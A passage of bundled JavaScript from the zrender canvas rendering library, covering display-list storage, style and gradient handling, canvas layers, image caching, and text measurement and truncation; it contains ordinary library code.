clipPaths, includeIgnore);\n            }\n\n            // Mark group clean here\n            el.__dirty = false;\n\n        }\n        else {\n            el.__clipPaths = clipPaths;\n\n            this._displayList[this._displayListLen++] = el;\n        }\n    },\n\n    /**\n     * 添加图形(Shape)或者组(Group)到根节点\n     * @param {module:zrender/Element} el\n     */\n    addRoot: function (el) {\n        if (el.__storage === this) {\n            return;\n        }\n\n        if (el instanceof Group) {\n            el.addChildrenToStorage(this);\n        }\n\n        this.addToStorage(el);\n        this._roots.push(el);\n    },\n\n    /**\n     * 删除指定的图形(Shape)或者组(Group)\n     * @param {string|Array.<string>} [el] 如果为空清空整个Storage\n     */\n    delRoot: function (el) {\n        if (el == null) {\n            // 不指定el清空\n            for (var i = 0; i < this._roots.length; i++) {\n                var root = this._roots[i];\n                if (root instanceof Group) {\n                    root.delChildrenFromStorage(this);\n                }\n            }\n\n            this._roots = [];\n            this._displayList = [];\n            this._displayListLen = 0;\n\n            return;\n        }\n\n        if (el instanceof Array) {\n            for (var i = 0, l = el.length; i < l; i++) {\n                this.delRoot(el[i]);\n            }\n            return;\n        }\n\n\n        var idx = indexOf(this._roots, el);\n        if (idx >= 0) {\n            this.delFromStorage(el);\n            this._roots.splice(idx, 1);\n            if (el instanceof Group) {\n                el.delChildrenFromStorage(this);\n            }\n        }\n    },\n\n    addToStorage: function (el) {\n        if (el) {\n            el.__storage = this;\n            el.dirty(false);\n        }\n        return this;\n    },\n\n    delFromStorage: function (el) {\n        if (el) {\n            el.__storage = null;\n        }\n\n        return this;\n    },\n\n    /**\n     * 清空并且释放Storage\n     */\n    dispose: function () {\n        this._renderList =\n        this._roots = null;\n    },\n\n    displayableSortFunc: shapeCompareFunc\n};\n\nvar SHADOW_PROPS = {\n    'shadowBlur': 1,\n    'shadowOffsetX': 1,\n    'shadowOffsetY': 1,\n    'textShadowBlur': 1,\n    'textShadowOffsetX': 1,\n    'textShadowOffsetY': 1,\n    'textBoxShadowBlur': 1,\n    'textBoxShadowOffsetX': 1,\n    'textBoxShadowOffsetY': 1\n};\n\nvar fixShadow = function (ctx, propName, value) {\n    if (SHADOW_PROPS.hasOwnProperty(propName)) {\n        return value *= ctx.dpr;\n    }\n    return value;\n};\n\nvar ContextCachedBy = {\n    NONE: 0,\n    STYLE_BIND: 1,\n    PLAIN_TEXT: 2\n};\n\n// Avoid confused with 0/false.\nvar WILL_BE_RESTORED = 9;\n\nvar STYLE_COMMON_PROPS = [\n    ['shadowBlur', 0], ['shadowOffsetX', 0], ['shadowOffsetY', 0], ['shadowColor', '#000'],\n    ['lineCap', 'butt'], ['lineJoin', 'miter'], ['miterLimit', 10]\n];\n\n// var SHADOW_PROPS = STYLE_COMMON_PROPS.slice(0, 4);\n// var LINE_PROPS = STYLE_COMMON_PROPS.slice(4);\n\nvar Style = function (opts) {\n    this.extendFrom(opts, false);\n};\n\nfunction createLinearGradient(ctx, obj, rect) {\n    var x = obj.x == null ? 0 : obj.x;\n    var x2 = obj.x2 == null ? 1 : obj.x2;\n    var y = obj.y == null ? 0 : obj.y;\n    var y2 = obj.y2 == null ? 0 : obj.y2;\n\n    if (!obj.global) {\n        x = x * rect.width + rect.x;\n        x2 = x2 * rect.width + rect.x;\n        y = y * rect.height + rect.y;\n        y2 = y2 * rect.height + rect.y;\n    }\n\n    // Fix NaN when rect is Infinity\n    x = isNaN(x) ? 0 : x;\n    x2 = isNaN(x2) ? 1 : x2;\n    y = isNaN(y) ? 0 : y;\n    y2 = isNaN(y2) ? 0 : y2;\n\n    var canvasGradient = ctx.createLinearGradient(x, y, x2, y2);\n\n    return canvasGradient;\n}\n\nfunction createRadialGradient(ctx, obj, rect) {\n    var width = rect.width;\n    var height = rect.height;\n    var min = Math.min(width, height);\n\n    var x = obj.x == null ? 0.5 : obj.x;\n    var y = obj.y == null ? 0.5 : obj.y;\n    var r = obj.r == null ? 0.5 : obj.r;\n    if (!obj.global) {\n        x = x * width + rect.x;\n        y = y * height + rect.y;\n        r = r * min;\n    }\n\n    var canvasGradient = ctx.createRadialGradient(x, y, 0, x, y, r);\n\n    return canvasGradient;\n}\n\n\nStyle.prototype = {\n\n    constructor: Style,\n\n    /**\n     * @type {string}\n     */\n    fill: '#000',\n\n    /**\n     * @type {string}\n     */\n    stroke: null,\n\n    /**\n     * @type {number}\n     */\n    opacity: 1,\n\n    /**\n     * @type {number}\n     */\n    fillOpacity: null,\n\n    /**\n     * @type {number}\n     */\n    strokeOpacity: null,\n\n    /**\n     * `true` is not supported.\n     * `false`/`null`/`undefined` are the same.\n     * `false` is used to remove lineDash in some\n     * case that `null`/`undefined` can not be set.\n     * (e.g., emphasis.lineStyle in echarts)\n     * @type {Array.<number>|boolean}\n     */\n    lineDash: null,\n\n    /**\n     * @type {number}\n     */\n    lineDashOffset: 0,\n\n    /**\n     * @type {number}\n     */\n    shadowBlur: 0,\n\n    /**\n     * @type {number}\n     */\n    shadowOffsetX: 0,\n\n    /**\n     * @type {number}\n     */\n    shadowOffsetY: 0,\n\n    /**\n     * @type {number}\n     */\n    lineWidth: 1,\n\n    /**\n     * If stroke ignore scale\n     * @type {Boolean}\n     */\n    strokeNoScale: false,\n\n    // Bounding rect text configuration\n    // Not affected by element transform\n    /**\n     * @type {string}\n     */\n    text: null,\n\n    /**\n     * If `fontSize` or `fontFamily` exists, `font` will be reset by\n     * `fontSize`, `fontStyle`, `fontWeight`, `fontFamily`.\n     * So do not visit it directly in upper application (like echarts),\n     * but use `contain/text#makeFont` instead.\n     * @type {string}\n     */\n    font: null,\n\n    /**\n     * The same as font. Use font please.\n     * @deprecated\n     * @type {string}\n     */\n    textFont: null,\n\n    /**\n     * It helps merging respectively, rather than parsing an entire font string.\n     * @type {string}\n     */\n    fontStyle: null,\n\n    /**\n     * It helps merging respectively, rather than parsing an entire font string.\n     * @type {string}\n     */\n    fontWeight: null,\n\n    /**\n     * It helps merging respectively, rather than parsing an entire font string.\n     * Should be 12 but not '12px'.\n     * @type {number}\n     */\n    fontSize: null,\n\n    /**\n     * It helps merging respectively, rather than parsing an entire font string.\n     * @type {string}\n     */\n    fontFamily: null,\n\n    /**\n     * Reserved for special functinality, like 'hr'.\n     * @type {string}\n     */\n    textTag: null,\n\n    /**\n     * @type {string}\n     */\n    textFill: '#000',\n\n    /**\n     * @type {string}\n     */\n    textStroke: null,\n\n    /**\n     * @type {number}\n     */\n    textWidth: null,\n\n    /**\n     * Only for textBackground.\n     * @type {number}\n     */\n    textHeight: null,\n\n    /**\n     * textStroke may be set as some color as a default\n     * value in upper applicaion, where the default value\n     * of textStrokeWidth should be 0 to make sure that\n     * user can choose to do not use text stroke.\n     * @type {number}\n     */\n    textStrokeWidth: 0,\n\n    /**\n     * @type {number}\n     */\n    textLineHeight: null,\n\n    /**\n     * 'inside', 'left', 'right', 'top', 'bottom'\n     * [x, y]\n     * Based on x, y of rect.\n     * @type {string|Array.<number>}\n     * @default 'inside'\n     */\n    textPosition: 'inside',\n\n    /**\n     * If not specified, use the boundingRect of a `displayable`.\n     * @type {Object}\n     */\n    textRect: null,\n\n    /**\n     * [x, y]\n     * @type {Array.<number>}\n     */\n    textOffset: null,\n\n    /**\n     * @type {string}\n     */\n    textAlign: null,\n\n    /**\n     * @type {string}\n     */\n    textVerticalAlign: null,\n\n    /**\n     * @type {number}\n     */\n    textDistance: 5,\n\n    /**\n     * @type {string}\n     */\n    textShadowColor: 'transparent',\n\n    /**\n     * @type {number}\n     */\n    textShadowBlur: 0,\n\n    /**\n     * @type {number}\n     */\n    textShadowOffsetX: 0,\n\n    /**\n     * @type {number}\n     */\n    textShadowOffsetY: 0,\n\n    /**\n     * @type {string}\n     */\n    textBoxShadowColor: 'transparent',\n\n    /**\n     * @type {number}\n     */\n    textBoxShadowBlur: 0,\n\n    /**\n     * @type {number}\n     */\n    textBoxShadowOffsetX: 0,\n\n    /**\n     * @type {number}\n     */\n    textBoxShadowOffsetY: 0,\n\n    /**\n     * Whether transform text.\n     * Only available in Path and Image element,\n     * where the text is called as `RectText`.\n     * @type {boolean}\n     */\n    transformText: false,\n\n    /**\n     * Text rotate around position of Path or Image.\n     * The origin of the rotation can be specified by `textOrigin`.\n     * Only available in Path and Image element,\n     * where the text is called as `RectText`.\n     */\n    textRotation: 0,\n\n    /**\n     * Text origin of text rotation.\n     * Useful in the case like label rotation of circular symbol.\n     * Only available in Path and Image element, where the text is called\n     * as `RectText` and the element is called as \"host element\".\n     * The value can be:\n     * + If specified as a coordinate like `[10, 40]`, it is the `[x, y]`\n     * base on the left-top corner of the rect of its host element.\n     * + If specified as a string `center`, it is the center of the rect of\n     * its host element.\n     * + By default, this origin is the `textPosition`.\n     * @type {string|Array.<number>}\n     */\n    textOrigin: null,\n\n    /**\n     * @type {string}\n     */\n    textBackgroundColor: null,\n\n    /**\n     * @type {string}\n     */\n    textBorderColor: null,\n\n    /**\n     * @type {number}\n     */\n    textBorderWidth: 0,\n\n    /**\n     * @type {number}\n     */\n    textBorderRadius: 0,\n\n    /**\n     * Can be `2` or `[2, 4]` or `[2, 3, 4, 5]`\n     * @type {number|Array.<number>}\n     */\n    textPadding: null,\n\n    /**\n     * Text styles for rich text.\n     * @type {Object}\n     */\n    rich: null,\n\n    /**\n     * {outerWidth, outerHeight, ellipsis, placeholder}\n     * @type {Object}\n     */\n    truncate: null,\n\n    /**\n     * https://developer.mozilla.org/en-US/docs/Web/API/CanvasRenderingContext2D/globalCompositeOperation\n     * @type {string}\n     */\n    blend: null,\n\n    /**\n     * @param {CanvasRenderingContext2D} ctx\n     */\n    bind: function (ctx, el, prevEl) {\n        var style = this;\n        var prevStyle = prevEl && prevEl.style;\n        // If no prevStyle, it means first draw.\n        // Only apply cache if the last time cachced by this function.\n        var notCheckCache = !prevStyle || ctx.__attrCachedBy !== ContextCachedBy.STYLE_BIND;\n\n        ctx.__attrCachedBy = ContextCachedBy.STYLE_BIND;\n\n        for (var i = 0; i < STYLE_COMMON_PROPS.length; i++) {\n            var prop = STYLE_COMMON_PROPS[i];\n            var styleName = prop[0];\n\n            if (notCheckCache || style[styleName] !== prevStyle[styleName]) {\n                // FIXME Invalid property value will cause style leak from previous element.\n                ctx[styleName] =\n                    fixShadow(ctx, styleName, style[styleName] || prop[1]);\n            }\n        }\n\n        if ((notCheckCache || style.fill !== prevStyle.fill)) {\n            ctx.fillStyle = style.fill;\n        }\n        if ((notCheckCache || style.stroke !== prevStyle.stroke)) {\n            ctx.strokeStyle = style.stroke;\n        }\n        if ((notCheckCache || style.opacity !== prevStyle.opacity)) {\n            ctx.globalAlpha = style.opacity == null ? 1 : style.opacity;\n        }\n\n        if ((notCheckCache || style.blend !== prevStyle.blend)) {\n            ctx.globalCompositeOperation = style.blend || 'source-over';\n        }\n        if (this.hasStroke()) {\n            var lineWidth = style.lineWidth;\n            ctx.lineWidth = lineWidth / (\n                (this.strokeNoScale && el && el.getLineScale) ? el.getLineScale() : 1\n            );\n        }\n    },\n\n    hasFill: function () {\n        var fill = this.fill;\n        return fill != null && fill !== 'none';\n    },\n\n    hasStroke: function () {\n        var stroke = this.stroke;\n        return stroke != null && stroke !== 'none' && this.lineWidth > 0;\n    },\n\n    /**\n     * Extend from other style\n     * @param {zrender/graphic/Style} otherStyle\n     * @param {boolean} overwrite true: overwrirte any way.\n     *                            false: overwrite only when !target.hasOwnProperty\n     *                            others: overwrite when property is not null/undefined.\n     */\n    extendFrom: function (otherStyle, overwrite) {\n        if (otherStyle) {\n            for (var name in otherStyle) {\n                if (otherStyle.hasOwnProperty(name)\n                    && (overwrite === true\n                        || (\n                            overwrite === false\n                                ? !this.hasOwnProperty(name)\n                                : otherStyle[name] != null\n                        )\n                    )\n                ) {\n                    this[name] = otherStyle[name];\n                }\n            }\n        }\n    },\n\n    /**\n     * Batch setting style with a given object\n     * @param {Object|string} obj\n     * @param {*} [obj]\n     */\n    set: function (obj, value) {\n        if (typeof obj === 'string') {\n            this[obj] = value;\n        }\n        else {\n            this.extendFrom(obj, true);\n        }\n    },\n\n    /**\n     * Clone\n     * @return {zrender/graphic/Style} [description]\n     */\n    clone: function () {\n        var newStyle = new this.constructor();\n        newStyle.extendFrom(this, true);\n        return newStyle;\n    },\n\n    getGradient: function (ctx, obj, rect) {\n        var method = obj.type === 'radial' ? createRadialGradient : createLinearGradient;\n        var canvasGradient = method(ctx, obj, rect);\n        var colorStops = obj.colorStops;\n        for (var i = 0; i < colorStops.length; i++) {\n            canvasGradient.addColorStop(\n                colorStops[i].offset, colorStops[i].color\n            );\n        }\n        return canvasGradient;\n    }\n\n};\n\nvar styleProto = Style.prototype;\nfor (var i = 0; i < STYLE_COMMON_PROPS.length; i++) {\n    var prop = STYLE_COMMON_PROPS[i];\n    if (!(prop[0] in styleProto)) {\n        styleProto[prop[0]] = prop[1];\n    }\n}\n\n// Provide for others\nStyle.getGradient = styleProto.getGradient;\n\nvar Pattern = function (image, repeat) {\n    // Should do nothing more in this constructor. Because gradient can be\n    // declard by `color: {image: ...}`, where this constructor will not be called.\n\n    this.image = image;\n    this.repeat = repeat;\n\n    // Can be cloned\n    this.type = 'pattern';\n};\n\nPattern.prototype.getCanvasPattern = function (ctx) {\n    return ctx.createPattern(this.image, this.repeat || 'repeat');\n};\n\n/**\n * @module zrender/Layer\n * @author pissang(https://www.github.com/pissang)\n */\n\nfunction returnFalse() {\n    return false;\n}\n\n/**\n * 创建dom\n *\n * @inner\n * @param {string} id dom id 待用\n * @param {Painter} painter painter instance\n * @param {number} number\n */\nfunction createDom(id, painter, dpr) {\n    var newDom = createCanvas();\n    var width = painter.getWidth();\n    var height = painter.getHeight();\n\n    var newDomStyle = newDom.style;\n    if (newDomStyle) {  // In node or some other non-browser environment\n        newDomStyle.position = 'absolute';\n        newDomStyle.left = 0;\n        newDomStyle.top = 0;\n        newDomStyle.width = width + 'px';\n        newDomStyle.height = height + 'px';\n\n        newDom.setAttribute('data-zr-dom-id', id);\n    }\n\n    newDom.width = width * dpr;\n    newDom.height = height * dpr;\n\n    return newDom;\n}\n\n/**\n * @alias module:zrender/Layer\n * @constructor\n * @extends module:zrender/mixin/Transformable\n * @param {string} id\n * @param {module:zrender/Painter} painter\n * @param {number} [dpr]\n */\nvar Layer = function (id, painter, dpr) {\n    var dom;\n    dpr = dpr || devicePixelRatio;\n    if (typeof id === 'string') {\n        dom = createDom(id, painter, dpr);\n    }\n    // Not using isDom because in node it will return false\n    else if (isObject$1(id)) {\n        dom = id;\n        id = dom.id;\n    }\n    this.id = id;\n    this.dom = dom;\n\n    var domStyle = dom.style;\n    if (domStyle) { // Not in node\n        dom.onselectstart = returnFalse; // 避免页面选中的尴尬\n        domStyle['-webkit-user-select'] = 'none';\n        domStyle['user-select'] = 'none';\n        domStyle['-webkit-touch-callout'] = 'none';\n        domStyle['-webkit-tap-highlight-color'] = 'rgba(0,0,0,0)';\n        domStyle['padding'] = 0; // eslint-disable-line dot-notation\n        domStyle['margin'] = 0; // eslint-disable-line dot-notation\n        domStyle['border-width'] = 0;\n    }\n\n    this.domBack = null;\n    this.ctxBack = null;\n\n    this.painter = painter;\n\n    this.config = null;\n\n    // Configs\n    /**\n     * 每次清空画布的颜色\n     * @type {string}\n     * @default 0\n     */\n    this.clearColor = 0;\n    /**\n     * 是否开启动态模糊\n     * @type {boolean}\n     * @default false\n     */\n    this.motionBlur = false;\n    /**\n     * 在开启动态模糊的时候使用，与上一帧混合的alpha值，值越大尾迹越明显\n     * @type {number}\n     * @default 0.7\n     */\n    this.lastFrameAlpha = 0.7;\n\n    /**\n     * Layer dpr\n     * @type {number}\n     */\n    this.dpr = dpr;\n};\n\nLayer.prototype = {\n\n    constructor: Layer,\n\n    __dirty: true,\n\n    __used: false,\n\n    __drawIndex: 0,\n    __startIndex: 0,\n    __endIndex: 0,\n\n    incremental: false,\n\n    getElementCount: function () {\n        return this.__endIndex - this.__startIndex;\n    },\n\n    initContext: function () {\n        this.ctx = this.dom.getContext('2d');\n        this.ctx.dpr = this.dpr;\n    },\n\n    createBackBuffer: function () {\n        var dpr = this.dpr;\n\n        this.domBack = createDom('back-' + this.id, this.painter, dpr);\n        this.ctxBack = this.domBack.getContext('2d');\n\n        if (dpr !== 1) {\n            this.ctxBack.scale(dpr, dpr);\n        }\n    },\n\n    /**\n     * @param  {number} width\n     * @param  {number} height\n     */\n    resize: function (width, height) {\n        var dpr = this.dpr;\n\n        var dom = this.dom;\n        var domStyle = dom.style;\n        var domBack = this.domBack;\n\n        if (domStyle) {\n            domStyle.width = width + 'px';\n            domStyle.height = height + 'px';\n        }\n\n        dom.width = width * dpr;\n        dom.height = height * dpr;\n\n        if (domBack) {\n            domBack.width = width * dpr;\n            domBack.height = height * dpr;\n\n            if (dpr !== 1) {\n                this.ctxBack.scale(dpr, dpr);\n            }\n        }\n    },\n\n    /**\n     * 清空该层画布\n     * @param {boolean} [clearAll]=false Clear all with out motion blur\n     * @param {Color} [clearColor]\n     */\n    clear: function (clearAll, clearColor) {\n        var dom = this.dom;\n        var ctx = this.ctx;\n        var width = dom.width;\n        var height = dom.height;\n\n        var clearColor = clearColor || this.clearColor;\n        var haveMotionBLur = this.motionBlur && !clearAll;\n        var lastFrameAlpha = this.lastFrameAlpha;\n\n        var dpr = this.dpr;\n\n        if (haveMotionBLur) {\n            if (!this.domBack) {\n                this.createBackBuffer();\n            }\n\n            this.ctxBack.globalCompositeOperation = 'copy';\n            this.ctxBack.drawImage(\n                dom, 0, 0,\n                width / dpr,\n                height / dpr\n            );\n        }\n\n        ctx.clearRect(0, 0, width, height);\n        if (clearColor && clearColor !== 'transparent') {\n            var clearColorGradientOrPattern;\n            // Gradient\n            if (clearColor.colorStops) {\n                // Cache canvas gradient\n                clearColorGradientOrPattern = clearColor.__canvasGradient || Style.getGradient(ctx, clearColor, {\n                    x: 0,\n                    y: 0,\n                    width: width,\n                    height: height\n                });\n\n                clearColor.__canvasGradient = clearColorGradientOrPattern;\n            }\n            // Pattern\n            else if (clearColor.image) {\n                clearColorGradientOrPattern = Pattern.prototype.getCanvasPattern.call(clearColor, ctx);\n            }\n            ctx.save();\n            ctx.fillStyle = clearColorGradientOrPattern || clearColor;\n            ctx.fillRect(0, 0, width, height);\n            ctx.restore();\n        }\n\n        if (haveMotionBLur) {\n            var domBack = this.domBack;\n            ctx.save();\n            ctx.globalAlpha = lastFrameAlpha;\n            ctx.drawImage(domBack, 0, 0, width, height);\n            ctx.restore();\n        }\n    }\n};\n\nvar requestAnimationFrame = (\n    typeof window !== 'undefined'\n    && (\n        (window.requestAnimationFrame && window.requestAnimationFrame.bind(window))\n        // https://github.com/ecomfe/zrender/issues/189#issuecomment-224919809\n        || (window.msRequestAnimationFrame && window.msRequestAnimationFrame.bind(window))\n        || window.mozRequestAnimationFrame\n        || window.webkitRequestAnimationFrame\n    )\n) || function (func) {\n    setTimeout(func, 16);\n};\n\nvar globalImageCache = new LRU(50);\n\n/**\n * @param {string|HTMLImageElement|HTMLCanvasElement|Canvas} newImageOrSrc\n * @return {HTMLImageElement|HTMLCanvasElement|Canvas} image\n */\nfunction findExistImage(newImageOrSrc) {\n    if (typeof newImageOrSrc === 'string') {\n        var cachedImgObj = globalImageCache.get(newImageOrSrc);\n        return cachedImgObj && cachedImgObj.image;\n    }\n    else {\n        return newImageOrSrc;\n    }\n}\n\n/**\n * Caution: User should cache loaded images, but not just count on LRU.\n * Consider if required images more than LRU size, will dead loop occur?\n *\n * @param {string|HTMLImageElement|HTMLCanvasElement|Canvas} newImageOrSrc\n * @param {HTMLImageElement|HTMLCanvasElement|Canvas} image Existent image.\n * @param {module:zrender/Element} [hostEl] For calling `dirty`.\n * @param {Function} [cb] params: (image, cbPayload)\n * @param {Object} [cbPayload] Payload on cb calling.\n * @return {HTMLImageElement|HTMLCanvasElement|Canvas} image\n */\nfunction createOrUpdateImage(newImageOrSrc, image, hostEl, cb, cbPayload) {\n    if (!newImageOrSrc) {\n        return image;\n    }\n    else if (typeof newImageOrSrc === 'string') {\n\n        // Image should not be loaded repeatly.\n        if ((image && image.__zrImageSrc === newImageOrSrc) || !hostEl) {\n            return image;\n        }\n\n        // Only when there is no existent image or existent image src\n        // is different, this method is responsible for load.\n        var cachedImgObj = globalImageCache.get(newImageOrSrc);\n\n        var pendingWrap = {hostEl: hostEl, cb: cb, cbPayload: cbPayload};\n\n        if (cachedImgObj) {\n            image = cachedImgObj.image;\n            !isImageReady(image) && cachedImgObj.pending.push(pendingWrap);\n        }\n        else {\n            image = new Image();\n            image.onload = image.onerror = imageOnLoad;\n\n            globalImageCache.put(\n                newImageOrSrc,\n                image.__cachedImgObj = {\n                    image: image,\n                    pending: [pendingWrap]\n                }\n            );\n\n            image.src = image.__zrImageSrc = newImageOrSrc;\n        }\n\n        return image;\n    }\n    // newImageOrSrc is an HTMLImageElement or HTMLCanvasElement or Canvas\n    else {\n        return newImageOrSrc;\n    }\n}\n\nfunction imageOnLoad() {\n    var cachedImgObj = this.__cachedImgObj;\n    this.onload = this.onerror = this.__cachedImgObj = null;\n\n    for (var i = 0; i < cachedImgObj.pending.length; i++) {\n        var pendingWrap = cachedImgObj.pending[i];\n        var cb = pendingWrap.cb;\n        cb && cb(this, pendingWrap.cbPayload);\n        pendingWrap.hostEl.dirty();\n    }\n    cachedImgObj.pending.length = 0;\n}\n\nfunction isImageReady(image) {\n    return image && image.width && image.height;\n}\n\nvar textWidthCache = {};\nvar textWidthCacheCounter = 0;\n\nvar TEXT_CACHE_MAX = 5000;\nvar STYLE_REG = /\\{([a-zA-Z0-9_]+)\\|([^}]*)\\}/g;\n\nvar DEFAULT_FONT$1 = '12px sans-serif';\n\n// Avoid assign to an exported variable, for transforming to cjs.\nvar methods$1 = {};\n\nfunction $override$1(name, fn) {\n    methods$1[name] = fn;\n}\n\n/**\n * @public\n * @param {string} text\n * @param {string} font\n * @return {number} width\n */\nfunction getWidth(text, font) {\n    font = font || DEFAULT_FONT$1;\n    var key = text + ':' + font;\n    if (textWidthCache[key]) {\n        return textWidthCache[key];\n    }\n\n    var textLines = (text + '').split('\\n');\n    var width = 0;\n\n    for (var i = 0, l = textLines.length; i < l; i++) {\n        // textContain.measureText may be overrided in SVG or VML\n        width = Math.max(measureText(textLines[i], font).width, width);\n    }\n\n    if (textWidthCacheCounter > TEXT_CACHE_MAX) {\n        textWidthCacheCounter = 0;\n        textWidthCache = {};\n    }\n    textWidthCacheCounter++;\n    textWidthCache[key] = width;\n\n    return width;\n}\n\n/**\n * @public\n * @param {string} text\n * @param {string} font\n * @param {string} [textAlign='left']\n * @param {string} [textVerticalAlign='top']\n * @param {Array.<number>} [textPadding]\n * @param {Object} [rich]\n * @param {Object} [truncate]\n * @return {Object} {x, y, width, height, lineHeight}\n */\nfunction getBoundingRect(text, font, textAlign, textVerticalAlign, textPadding, textLineHeight, rich, truncate) {\n    return rich\n        ? getRichTextRect(text, font, textAlign, textVerticalAlign, textPadding, textLineHeight, rich, truncate)\n        : getPlainTextRect(text, font, textAlign, textVerticalAlign, textPadding, textLineHeight, truncate);\n}\n\nfunction getPlainTextRect(text, font, textAlign, textVerticalAlign, textPadding, textLineHeight, truncate) {\n    var contentBlock = parsePlainText(text, font, textPadding, textLineHeight, truncate);\n    var outerWidth = getWidth(text, font);\n    if (textPadding) {\n        outerWidth += textPadding[1] + textPadding[3];\n    }\n    var outerHeight = contentBlock.outerHeight;\n\n    var x = adjustTextX(0, outerWidth, textAlign);\n    var y = adjustTextY(0, outerHeight, textVerticalAlign);\n\n    var rect = new BoundingRect(x, y, outerWidth, outerHeight);\n    rect.lineHeight = contentBlock.lineHeight;\n\n    return rect;\n}\n\nfunction getRichTextRect(text, font, textAlign, textVerticalAlign, textPadding, textLineHeight, rich, truncate) {\n    var contentBlock = parseRichText(text, {\n        rich: rich,\n        truncate: truncate,\n        font: font,\n        textAlign: textAlign,\n        textPadding: textPadding,\n        textLineHeight: textLineHeight\n    });\n    var outerWidth = contentBlock.outerWidth;\n    var outerHeight = contentBlock.outerHeight;\n\n    var x = adjustTextX(0, outerWidth, textAlign);\n    var y = adjustTextY(0, outerHeight, textVerticalAlign);\n\n    return new BoundingRect(x, y, outerWidth, outerHeight);\n}\n\n/**\n * @public\n * @param {number} x\n * @param {number} width\n * @param {string} [textAlign='left']\n * @return {number} Adjusted x.\n */\nfunction adjustTextX(x, width, textAlign) {\n    // FIXME Right to left language\n    if (textAlign === 'right') {\n        x -= width;\n    }\n    else if (textAlign === 'center') {\n        x -= width / 2;\n    }\n    return x;\n}\n\n/**\n * @public\n * @param {number} y\n * @param {number} height\n * @param {string} [textVerticalAlign='top']\n * @return {number} Adjusted y.\n */\nfunction adjustTextY(y, height, textVerticalAlign) {\n    if (textVerticalAlign === 'middle') {\n        y -= height / 2;\n    }\n    else if (textVerticalAlign === 'bottom') {\n        y -= height;\n    }\n    return y;\n}\n\n/**\n * Follow same interface to `Displayable.prototype.calculateTextPosition`.\n * @public\n * @param {Obejct} [out] Prepared out object. If not input, auto created in the method.\n * @param {module:zrender/graphic/Style} style where `textPosition` and `textDistance` are visited.\n * @param {Object} rect {x, y, width, height} Rect of the host elment, according to which the text positioned.\n * @return {Object} The input `out`. Set: {x, y, textAlign, textVerticalAlign}\n */\nfunction calculateTextPosition(out, style, rect) {\n    var textPosition = style.textPosition;\n    var distance = style.textDistance;\n\n    var x = rect.x;\n    var y = rect.y;\n    distance = distance || 0;\n\n    var height = rect.height;\n    var width = rect.width;\n    var halfHeight = height / 2;\n\n    var textAlign = 'left';\n    var textVerticalAlign = 'top';\n\n    switch (textPosition) {\n        case 'left':\n            x -= distance;\n            y += halfHeight;\n            textAlign = 'right';\n            textVerticalAlign = 'middle';\n            break;\n        case 'right':\n            x += distance + width;\n            y += halfHeight;\n            textVerticalAlign = 'middle';\n            break;\n        case 'top':\n            x += width / 2;\n            y -= distance;\n            textAlign = 'center';\n            textVerticalAlign = 'bottom';\n            break;\n        case 'bottom':\n            x += width / 2;\n            y += height + distance;\n            textAlign = 'center';\n            break;\n        case 'inside':\n            x += width / 2;\n            y += halfHeight;\n            textAlign = 'center';\n            textVerticalAlign = 'middle';\n            break;\n        case 'insideLeft':\n            x += distance;\n            y += halfHeight;\n            textVerticalAlign = 'middle';\n            break;\n        case 'insideRight':\n            x += width - distance;\n            y += halfHeight;\n            textAlign = 'right';\n            textVerticalAlign = 'middle';\n            break;\n        case 'insideTop':\n            x += width / 2;\n            y += distance;\n            textAlign = 'center';\n            break;\n        case 'insideBottom':\n            x += width / 2;\n            y += height - distance;\n            textAlign = 'center';\n            textVerticalAlign = 'bottom';\n            break;\n        case 'insideTopLeft':\n            x += distance;\n            y += distance;\n            break;\n        case 'insideTopRight':\n            x += width - distance;\n            y += distance;\n            textAlign = 'right';\n            break;\n        case 'insideBottomLeft':\n            x += distance;\n            y += height - distance;\n            textVerticalAlign = 'bottom';\n            break;\n        case 'insideBottomRight':\n            x += width - distance;\n            y += height - distance;\n            textAlign = 'right';\n            textVerticalAlign = 'bottom';\n            break;\n    }\n\n    out = out || {};\n    out.x = x;\n    out.y = y;\n    out.textAlign = textAlign;\n    out.textVerticalAlign = textVerticalAlign;\n\n    return out;\n}\n\n/**\n * To be removed. But still do not remove in case that some one has imported it.\n * @deprecated\n * @public\n * @param {stirng} textPosition\n * @param {Object} rect {x, y, width, height}\n * @param {number} distance\n * @return {Object} {x, y, textAlign, textVerticalAlign}\n */\n\n\n/**\n * Show ellipsis if overflow.\n *\n * @public\n * @param  {string} text\n * @param  {string} containerWidth\n * @param  {string} font\n * @param  {number} [ellipsis='...']\n * @param  {Object} [options]\n * @param  {number} [options.maxIterations=3]\n * @param  {number} [options.minChar=0] If truncate result are less\n *                  then minChar, ellipsis will not show, which is\n *                  better for user hint in some cases.\n * @param  {number} [options.placeholder=''] When all truncated, use the placeholder.\n * @return {string}\n */\nfunction truncateText(text, containerWidth, font, ellipsis, options) {\n    if (!containerWidth) {\n        return '';\n    }\n\n    var textLines = (text + '').split('\\n');\n    options = prepareTruncateOptions(containerWidth, font, ellipsis, options);\n\n    // FIXME\n    // It is not appropriate that every line has '...' when truncate multiple lines.\n    for (var i = 0, len = textLines.length; i < len; i++) {\n        textLines[i] = truncateSingleLine(textLines[i], options);\n    }\n\n    return textLines.join('\\n');\n}\n\nfunction prepareTruncateOptions(containerWidth, font, ellipsis, options) {\n    options = extend({}, options);\n\n    options.font = font;\n    var ellipsis = retrieve2(ellipsis, '...');\n    options.maxIterations = retrieve2(options.maxIterations, 2);\n    var minChar = options.minChar = retrieve2(options.minChar, 0);\n    // FIXME\n    // Other languages?\n    options.cnCharWidth = getWidth('国', font);\n    // FIXME\n    // Consider proportional font?\n    var ascCharWidth = options.ascCharWidth = getWidth('a', font);\n    options.placeholder = retrieve2(options.placeholder, '');\n\n    // Example 1: minChar: 3, text: 'asdfzxcv', truncate result: 'asdf', but not: 'a...'.\n    // Example 2: minChar: 3, text: '维度', truncate result: '维', but not: '...'.\n    var contentWidth = containerWidth = Math.max(0, containerWidth - 1); // Reserve some gap.\n    for (var i = 0; i < minChar && contentWidth >= ascCharWidth; i++) {\n        contentWidth -= ascCharWidth;\n    }\n\n    var ellipsisWidth = getWidth(ellipsis, font);\n    if (ellipsisWidth > contentWidth) {\n        ellipsis = '';\n        ellipsisWidth = 0;\n    }\n\n    contentWidth = containerWidth - ellipsisWidth;\n\n    options.ellipsis = ellipsis;\n    options.ellipsisWidth = ellipsisWidth;\n    options.contentWidth = contentWidth;\n    options.containerWidth = containerWidth;\n\n    return options;\n}\n\nfunction truncateSingleLine(textLine, options) {\n    var containerWidth = options.containerWidth;\n    var font = options.font;\n    var contentWidth = options.contentWidth;\n\n    if (!containerWidth) {\n        return '';\n    }\n\n    var lineWidth = 